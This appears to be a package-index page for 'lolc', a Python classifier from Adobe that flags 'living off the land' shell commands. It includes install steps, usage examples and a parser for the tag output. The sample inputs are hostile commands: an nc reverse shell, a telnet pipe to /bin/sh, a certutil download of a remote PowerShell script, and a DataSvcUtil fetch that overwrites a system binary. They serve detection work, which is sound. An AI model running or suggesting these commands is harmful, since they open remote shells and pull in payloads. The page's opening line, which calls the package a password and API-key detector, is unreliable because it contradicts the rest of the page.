
Python module for detecting passwords, API keys, hashes and any other string that resembles a randomly generated character sequence.

Project description

Living off the Land Classifier

This repository contains the source code and pre-trained models for the Living off the Land Classifier, designed by the Security Intelligence (SI) Team of the Security Coordination Center (SCC) @ Adobe.

Quick start guide

If you have experience with Python and are eager to get started, check the Quick start Jupyter Notebook instead of this documentation.

To get the library up and running in no time, follow the tutorial below. If you want to build your own model, please refer to the "Advanced usage and documentation" section (below).

Prerequisites

Before you proceed, make sure your system meets the following requirements:

  • Python 3.7+ installed and running on your system
  • PIP package installer
  • We recommend using a virtual environment. See the official documentation for details

Quick installation

The easiest way to get LOL running is with pip. You can run the following command directly on your system or, preferably, inside a virtual environment:

$ pip install lolc

To test the installation, run one of the following scripts (or the equivalent IPython commands), which are also in the Quick start Jupyter Notebook:

LINUX

from lol.api import LOLC, PlatformType

lolc = LOLC(PlatformType.LINUX)  # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands = ['nc -nlvp 1234 & nc -e /bin/bash 10.20.30.40 4321',
            'iptables -t nat -L -n',
            'telnet 10.20.30.40 5000 | /bin/sh | 10.20.30.50 5001']
classification, tags = lolc(commands)  # one verdict and one tag string per command
for command, status, tag in zip(commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("\n")

The output should be:

nc -nlvp 1234 & nc -e /bin/bash 10.20.30.40 4321
BAD
IP_PRIVATE PATH_/BIN/BASH COMMAND_NC KEYWORD_-NLVP KEYWORD_-E nc_listener_to_shell LOOKS_LIKE_KNOWN_LOL

iptables -t nat -L -n
GOOD
COMMAND_IPTABLES KEYWORD_-T KEYWORD_-L KEYWORD_-N iptables_list

telnet 10.20.30.40 5000 | /bin/sh | 10.20.30.50 5001
BAD
IP_PRIVATE PATH_/BIN/SH COMMAND_TELNET telnet_sh LOOKS_LIKE_KNOWN_LOL

WINDOWS

from lol.api import LOLC, PlatformType

lolc = LOLC(PlatformType.WINDOWS)  # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands = ['certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\\temp:ttt',
            'explorer.exe c:\\temp',
            'DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://11.11.11.11/xxxxxxxxx?encodedfile']
classification, tags = lolc(commands)  # one verdict and one tag string per command
for command, status, tag in zip(commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("\n")

The output should be:

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
BAD
COMMAND_CERTUTIL.EXE KEYWORD_dash_urlcache KEYWORD_dash_f KEYWORD_http certutil_downloader powershell_file

explorer.exe c:\temp
NEUTRAL
# this line is empty

DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://11.11.11.11/xxxxxxxxx?encodedfile
BAD
IP_PUBLIC COMMAND_DATASVCUTIL DataSvcUtil_http KEYWORD_http
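The Linux and Windows runs above both return a verdict list and a list of space-separated tag strings. The following is an added example (not part of libLOL) that turns that output into structured triage records a detection pipeline can act on; it assumes the tag conventions visible in the sample output (IP_, PATH_, COMMAND_ and KEYWORD_ prefixes, lower-case rule names such as nc_listener_to_shell, and the LOOKS_LIKE_KNOWN_LOL flag), and its sample input is the Linux output reproduced from this page.

```python
from dataclasses import dataclass, field

# Tag prefixes as they appear in the sample output on this page (assumption: stable).
ENTITY_PREFIXES = ("IP_", "PATH_", "COMMAND_", "KEYWORD_")

@dataclass
class Triage:
    command: str
    verdict: str                                   # "BAD", "GOOD" or "NEUTRAL"
    entities: dict = field(default_factory=dict)   # e.g. "COMMAND" -> ["NC"]
    rules: list = field(default_factory=list)      # matched rule names, e.g. nc_listener_to_shell
    known_lol: bool = False                        # LOOKS_LIKE_KNOWN_LOL was emitted

def parse_tags(tag_string):
    """Split one tag string into entities, rule names and the known-LOL flag."""
    entities = {p.rstrip("_"): [] for p in ENTITY_PREFIXES}
    rules, known_lol = [], False
    for tag in tag_string.split():            # an empty string (NEUTRAL case) yields no tags
        if tag == "LOOKS_LIKE_KNOWN_LOL":
            known_lol = True
            continue
        for prefix in ENTITY_PREFIXES:
            if tag.startswith(prefix):
                entities[prefix.rstrip("_")].append(tag[len(prefix):])
                break
        else:
            rules.append(tag)                 # anything else is a matched rule name
    return entities, rules, known_lol

def triage(commands, classification, tags):
    """Zip the parallel lists around lolc(commands) into Triage records."""
    records = []
    for command, verdict, tag_string in zip(commands, classification, tags):
        entities, rules, known_lol = parse_tags(tag_string)
        records.append(Triage(command, verdict, entities, rules, known_lol))
    return records

def alerts(records):
    """Records worth escalating: verdict BAD, known-LOL matches first (stable sort)."""
    return sorted((r for r in records if r.verdict == "BAD"), key=lambda r: not r.known_lol)

# Constructed sample: the Linux quick-start output reproduced from this page.
SAMPLE_COMMANDS = ['nc -nlvp 1234 & nc -e /bin/bash 10.20.30.40 4321',
                   'iptables -t nat -L -n',
                   'telnet 10.20.30.40 5000 | /bin/sh | 10.20.30.50 5001']
SAMPLE_CLASSIFICATION = ['BAD', 'GOOD', 'BAD']
SAMPLE_TAGS = ['IP_PRIVATE PATH_/BIN/BASH COMMAND_NC KEYWORD_-NLVP KEYWORD_-E nc_listener_to_shell LOOKS_LIKE_KNOWN_LOL',
               'COMMAND_IPTABLES KEYWORD_-T KEYWORD_-L KEYWORD_-N iptables_list',
               'IP_PRIVATE PATH_/BIN/SH COMMAND_TELNET telnet_sh LOOKS_LIKE_KNOWN_LOL']
```

With the real classifier, pass its result straight through: `triage(commands, *lolc(commands))`, since `lolc(commands)` returns the (classification, tags) pair.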

Advanced usage and documentation

This documentation is still under development. We will provide complete examples accompanied by Jupyter Notebooks.

Installation via GitHub (for advanced usage)

git clone git@github.com:adobe/libLOL.git
cd libLOL
virtualenv -p `which python3` venv
source venv/bin/activate
pip3 install -r requirements.txt

Download files

Download the file for your platform.

Source Distribution

  • lolc-0.1.0.6.tar.gz (4.4 MB)

Built Distribution

  • lolc-0.1.0.6-py3-none-any.whl (4.5 MB)

File details

Details for the file lolc-0.1.0.6.tar.gz.

File metadata

  • Download URL: lolc-0.1.0.6.tar.gz
  • Size: 4.4 MB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.8.0 pkginfo/1.8.2 readme-renderer/32.0 requests/2.27.1 requests-toolbelt/0.9.1 urllib3/1.26.8 tqdm/4.63.0 importlib-metadata/4.11.2 keyring/23.5.0 rfc3986/2.0.0 colorama/0.4.4 CPython/3.8.9

File hashes

Hashes for lolc-0.1.0.6.tar.gz

  Algorithm    Hash digest
  SHA256       8f72c45669aec91534bf318f7fe71e178c1059ed9fff5009578a76934867abb6
  MD5          0a2b54852d0b4538d507dcab890c8d44
  BLAKE2b-256  6e6d215525faa3493aba7138c0a82e361181e6e581ab832c89045bedc3ba2078

File details

Details for the file lolc-0.1.0.6-py3-none-any.whl.

File metadata

  • Download URL: lolc-0.1.0.6-py3-none-any.whl
  • Size: 4.5 MB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.8.0 pkginfo/1.8.2 readme-renderer/32.0 requests/2.27.1 requests-toolbelt/0.9.1 urllib3/1.26.8 tqdm/4.63.0 importlib-metadata/4.11.2 keyring/23.5.0 rfc3986/2.0.0 colorama/0.4.4 CPython/3.8.9

File hashes

Hashes for lolc-0.1.0.6-py3-none-any.whl

  Algorithm    Hash digest
  SHA256       c9794a19b675bfd7ff3f7f48b00bdb66771c8583a40bbbd65627533c37a0cf22
  MD5          04abafc3a51e4ea8c1bf721bbb6ea3ca
  BLAKE2b-256  0f5771a2e9078d5c2a933e300c5844c447205fee189a34138f70328720ae9d02
